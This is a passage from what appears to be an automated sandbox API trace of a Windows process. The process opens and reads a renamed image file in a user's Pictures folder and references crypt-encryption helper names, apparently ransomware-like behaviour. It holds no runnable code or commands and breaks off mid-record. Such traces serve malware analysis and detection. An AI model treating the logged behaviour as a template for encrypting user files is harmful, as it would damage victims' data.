1 [0191.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0191.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.833] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.flyingship.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zvog.flyingship.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0191.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0191.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0191.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0191.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0191.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0191.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.835] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0191.835] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0191.839] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x1ae2, lpOverlapped=0x0) returned 1 [0191.839] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0191.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0191.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0191.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11ae2) returned 0xbea018 [0191.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0191.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0191.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0191.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0191.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0191.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11ae2) returned 0xbfbb08 [0191.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0191.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.842] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0191.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0191.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0191.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0191.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11ae2) returned 0xbea018 [0191.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0191.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0191.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0191.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0191.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.842] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0191.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0191.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0191.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0191.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0191.843] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0191.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0191.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.843] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0191.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0191.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0191.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0191.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0191.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0191.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0191.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11ae2) returned 0xbea018 [0191.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0191.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0191.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0191.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0191.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0191.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0191.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0191.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0191.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0191.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0191.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0191.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0191.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba570 [0191.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0191.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0191.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0191.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0191.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0191.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11ae2) returned 0xa5f008 [0191.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0191.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0191.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0191.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0191.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0191.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0191.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0191.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0191.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0191.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0191.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0191.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0191.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0191.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0191.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0191.847] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0191.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0191.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0191.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0191.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0191.847] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0191.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0191.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0191.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0191.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0191.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0191.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0191.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0191.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0191.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0191.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0191.847] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0191.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0191.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0191.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28d8 [0191.847] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0191.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0191.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0191.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0191.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda20 [0191.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0191.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0191.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0191.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0191.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0191.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0191.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0191.848] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0191.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0191.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0191.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0191.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0191.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0191.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0191.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0191.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0191.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0191.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0191.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0191.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0191.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0191.849] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0191.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0191.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0191.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0191.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0191.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0191.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0191.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0191.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0191.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0191.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0191.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0191.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0191.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0191.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0191.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0191.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0191.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0191.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0191.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0191.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0191.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0191.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0191.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0191.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.850] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0191.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0191.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0191.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0191.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0191.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0191.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0191.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0191.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0191.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0191.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0191.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0191.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0191.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0191.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0191.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0191.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0191.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0191.851] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0191.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0191.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0191.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0191.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0191.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0191.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0191.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0191.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0191.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0191.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.851] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0191.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0191.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0191.852] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0191.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0191.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0191.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0191.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0191.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0191.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0191.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 